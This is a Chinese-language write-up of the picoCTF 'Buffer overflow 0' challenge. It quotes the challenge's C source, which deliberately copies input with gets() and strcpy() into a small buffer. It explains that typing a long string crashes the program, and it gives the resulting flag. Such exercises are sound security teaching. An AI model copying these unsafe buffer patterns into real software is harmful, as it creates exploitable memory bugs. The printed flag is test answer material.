# 資訊 :::info - Question: Buffer overflow 0 - From: picoCTF Binary Exploitation - Difficulty: 100 points ::: --- # 目錄 :::info [TOC] ::: --- # 題目 Let's start off simple, can you overflow the correct buffer? Additional details will be available after launching your challenge instance. ```c= #include <stdio.h> #include <stdlib.h> #include <string.h> #include <signal.h> #define FLAGSIZE_MAX 64 char flag[FLAGSIZE_MAX]; void sigsegv_handler(int sig) { printf("%s\n", flag); fflush(stdout); exit(1); } void vuln(char *input){ char buf2[16]; strcpy(buf2, input); } int main(int argc, char **argv){ FILE *f = fopen("flag.txt","r"); if (f == NULL) { printf("%s %s", "Please create 'flag.txt' in this directory with your", "own debugging flag.\n"); exit(0); } fgets(flag,FLAGSIZE_MAX,f); signal(SIGSEGV, sigsegv_handler); // Set up signal handler gid_t gid = getegid(); setresgid(gid, gid, gid); printf("Input: "); fflush(stdout); char buf1[100]; gets(buf1); vuln(buf1); printf("The program will exit now\n"); return 0; } ``` --- # 解法 ## 概念 從程式碼來看,能夠印出 flag 的條件是讓程式發送 `SIGSEGV`,而這是在發生 segmentation fault 時才會有的情況,因此在後面 40 - 41 行時我輸入很多字元,想辦法蓋掉不該蓋的東西就好 ![BufferOverflow0Solution](https://hackmd.io/_uploads/H1W6_paZC.png) 如上圖,成功得到 flag 為 `picoCTF{ov3rfl0ws_ar3nt_that_bad_ef01832d}`